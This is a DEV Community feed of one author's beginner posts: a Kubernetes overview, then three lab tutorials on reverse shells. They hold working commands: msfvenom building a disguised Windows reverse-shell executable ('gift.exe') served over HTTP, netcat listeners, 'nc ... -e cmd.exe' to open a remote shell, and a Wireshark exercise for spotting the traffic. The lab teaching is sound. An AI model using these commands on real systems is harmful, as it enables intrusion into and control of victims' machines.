DEV Community: Kalaimani

Kubernetes Overview

Kalaimani — Sun, 22 Sep 2024 09:07:57 +0000

This is first of a series of bite sized posts about Kubernetes technology in simple terms, targeted for beginners, especially for application developers. Here we don't focus much on Kubernetes cluster administration.

Kubernetes is an open-source container orchestration platform.

Container is an virtually isolated application process along with its runtime environment. Container is created from its image.

Container image is a portable bundle of an application along with all its runtime dependencies.

Container orchestration is managing containers workloads at large scale, with the help of container runtimes. Some examples of container orchestration platforms are Kubernetes, Docker Swarm and Hashicorp Nomad.

Container runtime is service that manages execution lifecycle of the containers. Examples of container runtimes are CRI-O, Dockerd, Containerd, etc..

Why Kubernetes?

Automatically brings current state of the application workload to desired state of deployment.
Efficiently allocate resources to application workloads.
It can horizontal scale itself as well as the application work loads.
It can automatically recover the applications from node failures.
It has builtin components for service discovery and load balancing.
Provides networking with both IPv4 and IPv6.
Provides storage abstractions which can be backed by various types of storage systems such as EBS, EFS, FSx, S3, and more..
Offers builtin Secret and configuration management.
Supports Batch execution workloads.
It is extensible though plugins.

Creating reverse shell binary

Kalaimani — Sun, 27 Mar 2022 16:34:12 +0000

So far we have played only with nectat in command line in order to understand reverse shell. Now we are going to go just one step further close to real world by creating an executable binary of a reverse shell.

For this we need msfvenom which is part of Metasploit Framework. It comes preinstalled with Kali Linux, if you are going to use some other operating system, there is a very good official guide here for how to install Metasploit in different OS. In my case the victim machine runs on Windows 10 and the attack machine runs on Xubuntu 20.04. Both are virtual machines.

One important thing to do before this experiment, you will have to turn off the firewall in your attacker machine. Victim machine's firewall mostly won't block any outbound connections. In case you are getting any issues, turn that one off as well. There are techniques to bypass the firewalls and IDS/IPS, but we are going to keep things simple for now by turning off the firewall.

First open up a terminal in your attack machine and run the following command.

msfvenom -p windows/shell_reverse_tcp LHOST=<attack-machine ip> LPORT=<attack-machine port> -f exe > gift.exe

It should generate gift.exe in your current directory. Then run the following command to spin up a http server so that gift.exe can be downloaded into the victim machine.

python3 -m http.server

Now open up the browser in the victim machine and go to http://attack-machine-ip:8000 and click the link to gift.exe and click the keep button on the pop-up to proceed the download.

After the download you can stop the http server in your attack machine by pressing CTL+C and then run the following command to spin up the netcat instance in listener mode.

nc -l -p 8989

Now you can open the gift.exe and it will run on the background and you won't notice any change in you screen.

Note that I have moved the gift.exe to my Desktop and ran it from there just for clarity, but you can run it from anywhere in your victim machine. Now you can go to your attack machine and see that you have got a reverse shell to play with..

In real world, Attacker might change the logo of the executable to trick you to believe as if it is just a document or some other file as the extensions are hidden in Windows by default.

I hope you find this post useful. See you on next one..

Sniffing the Reverse Shell

Kalaimani — Fri, 25 Mar 2022 11:29:48 +0000

This is a follow up of my previous post Glimpse of Reverse Shell

Now we are going to see how the reverse shell's network traffic looks like using the Wireshark.

First start Wireshark (assuming that you have already installed it in your machine) and click the capture button after selecting your targeted network interface (in my case I have only one "Ethernet").

Then follow the steps from Glimpse of Reverse Shell and type any command in the reverse shell. It will generate some network and it will show up on the WireShark at midst of other network activities.

In our case we know the destination port is 8989, so we can apply it as filter like this,

Then we can follow the TCP stream of the filtered traffic

Finally we get see the result of the command that have executed remotely

Again it is very beginner level demonstration of how to look for network traffic of a naive reverse shell. In real world scenario it would be complicated to varying degrees. For example the network traffic might be encrypted or the data might be obfuscated. I hope this helps you to get some basic understanding of the reverse shell's traffic..

Glimpse of Reverse Shell

Kalaimani — Fri, 25 Mar 2022 09:06:31 +0000

Reverse shell is connection that originates from victim machine to attacker machine as result of malware infection or a vulnerability exploitation.

But you can get glimpse of how reverse shell works without exploiting or infecting a machine with simple netcat command. here how it works..

First run the following command on the remote system. The -l option sets the netcat on listening mode.

nc -l -p <port to listen on>

And then run this command on victim machine. The -e option binds the standard input and output of a cmd.exe instance to netcat socket which is about to establish a connection to the remote machine.

nc <remote ip> <remote port> -e cmd.exe

Et voilà.. You get a remote shell and you can type commands to get the results on the other end

More or less malware and exploits do something similar but in stealthy way. I hope this helps you as beginner how reverse shell works..